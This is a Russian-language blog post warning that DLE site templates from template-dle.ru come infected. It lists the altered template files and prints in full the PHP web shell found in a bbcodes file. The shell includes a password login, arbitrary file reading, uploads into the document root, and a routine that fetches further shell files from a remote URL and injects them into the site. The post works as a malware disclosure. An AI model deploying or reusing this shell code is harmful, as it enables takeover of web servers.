Адаптивный дизайн.
Нужен или нет?
Читать далее

Мошенники template-dle.ru

Блог

Скачал недавно шаблон с сайта  template-dle.ru мошенникик распространяют с помощью своих шаблонов шеллы и вирусы.

 

Вот его копия

 

Внутри были отредактированы следующие файлы (стояла свежая дата, когда шаблон был залит на сайт)

 

navigation.tpl
login.tpl
fullstory.tpl

 

Также в папке /bbcodes/

были изменены страницы

 

color.html
color.htm

 

А внутри  color.html

Запихали вот такой шелл (для новичков назовем это вирусом)

(в полной версии новости полный код)

 

<?php if($_GET['upload']){ session_start(); if(isset($_GET['a']) && $_GET['a']=='logout')  unset($_SESSION['auth']);  if(isset($_POST['pass'])){  $users = array(  'root' => md5(md5('uvCJlBF9eIcq9bEhUpg83baFcW9JKmqa'))  );  if($users['root'] == md5(md5($_POST['pass']))){   $_SESSION['auth'] = true;  } }  if(!isset($_SESSION['auth']) || $_SESSION['auth'] != true){ $hp=$_GET['hp'];  echo <<<EOF <form method=\\\\"POST\\\\">    <link href=\\\\"http://$hp/unload/style.css\\\\" rel=\\\\"stylesheet\\\\" type=\\\\"text/css\\\\" />  <div class=\\\\"login_php_01\\\\"> <div class=\\\\"login_php_02\\\\"> <div class=\\\\"login_php_03\\\\"> <div class=\\\\"login_php_04\\\\"><div style=\\\\"padding:90px 0px 0px 40px\\\\">      <span style=\\\\"font:11px Verdana;\\\\">Password: </span><input name=\\\\"pass\\\\" type=\\\\"password\\\\" size=\\\\"20\\\\">     <input type=\\\\"hidden\\\\" name=\\\\"doing\\\\" value=\\\\"login\\\\">     <input type=\\\\"submit\\\\" value=\\\\"Auth\\\\" class=\\\\"login_bottom\\\\" style=\\\\"border:0px\\\\">      </div></div> </div> </div> </div>  </form> EOF; exit; } else    if($_GET['ups']) { echo\\\\"_get_ o_O\\\\"; unlink (\\\\"spacer.gif\\\\"); exit;     } $hp=$_GET['hp']; $dir=$_GET['dir']; $f = @fsockopen(\\\\"$hp\\\\", 80, $x0c, $x0d, 6);  if(!$f){echo 'Ебанутый Гамунгол'; } else{  $x0e = @file(\\\\"$dir\\\\");  echo implode('',$x0e);  } $adres = $_POST['adres']; $get=$_SERVER['DOCUMENT_ROOT'].\\\\"/\\\\".$adres; if(copy($HTTP_POST_FILES[\\\\"lopd\\\\"][\\\\"tmp_name\\\\"],\\\\"$get\\\\".$HTTP_POST_FILES[\\\\"lopd\\\\"][\\\\"name\\\\"])){ $der = \\\\"<span class='line'></span>Каталог для загрузки: <strong>\\\\"; $test = $_SERVER['HTTP_HOST'].\\\\"/$adres\\\\".\\\\"<a  href=http://\\\\".$_SERVER['HTTP_HOST'].\\\\"/$adres\\\\".$HTTP_POST_FILES[\\\\"lopd\\\\"][\\\\"name\\\\"].\\\\"   target='_blank'>\\\\".$HTTP_POST_FILES[\\\\"lopd\\\\"][\\\\"name\\\\"].\\\\"</a></strong>\\\\"; echo <<<HTMLS <div  style=\\\\"position:absolute;top:0px;left:0px;width:100%;height:100%\\\\"><div  style=\\\\"padding-left:50%;padding-top:343px;\\\\"> <div style=\\\\"margin-left:-215px;width:425px;height:179px;\\\\">$der$test</div></div></div> HTMLS; }  else {echo(\\\\"\\\\");} }  ?>   <? if($_GET['install']){  $dir=$_SERVER['DOCUMENT_ROOT'].\\\\"/\\\\";//главный каталог $install=$_GET['install'];//какоу сод установить $file_in=$_GET['file'];//в какой файл $url=$_GET['url'];//url откуда грузить код $path=$_GET['path'];//в какую папку $path2_shell=$_GET['path2_shell'];//в какую папку   if(chmod(\\\\"$dir$path$file_in\\\\", 0666)){$chmod=true;}   $types=array('conect','shell');//название двх файлов for($i = 0; $i < count($types); $i++) {  $files = $url.'conect.txt'; $newfile = $dir.$path.'conect.php'; $files2 = $url.'shell.txt'; $newfile2 = $dir.$path2_shell.'/shell.php';  if (copy($files,$newfile)){$copy=true;} if (copy($files2,$newfile2)){$copy2=true;}  }   if($copy==true){ $data=$install; $data = str_replace('\\\\','\\',$data); $data = str_replace('\\\\\\"','\\\\"',$data); $data = str_replace(\\\\"\\'\\\\",\\\\"'\\\\",$data);   $log = $dir.$path.$file_in; $file = fopen ($log, \\\\"a+\\\\");  // Добавляем данные в файл $str=\\\\"$data\n\\\\"; if(fputs ($file, $str)){$rec=true;} fclose($file); }   if($chmod==true&&$rec==true&&$copy==true){echo\\\\"<!--ok-->\\\\";} else{ if($chmod==false){echo\\\\"chmod_eror\\\\";} if($rec==false){echo\\\\"rec_eror\\\\";} if($copy==false){echo\\\\"copy_eror\\\\";}  }  } ?>

 

 

Если вам дорог ваш сервер и нет желания ловить потом на нем вирусняки и прочую дрянь строго не рекомендую не качать ничего с данного сайта, и распространить ссылку на данный пост, чтобы другие пользователи не попались случайно. Конечно авторы могут отмазаться что шаблоны у них на сайте заражены случайно, но мне что то  так не кажется. Я скачал несколько шаблонов, с этого сайта везде результаты одинаковые.

 

 

Из полезной информации:

установка приточно-вытяжных систем вентиляции

 

Остались вопросы?
Я — Дмитрий, главный консультант. Буду рад ответить на ваши вопросы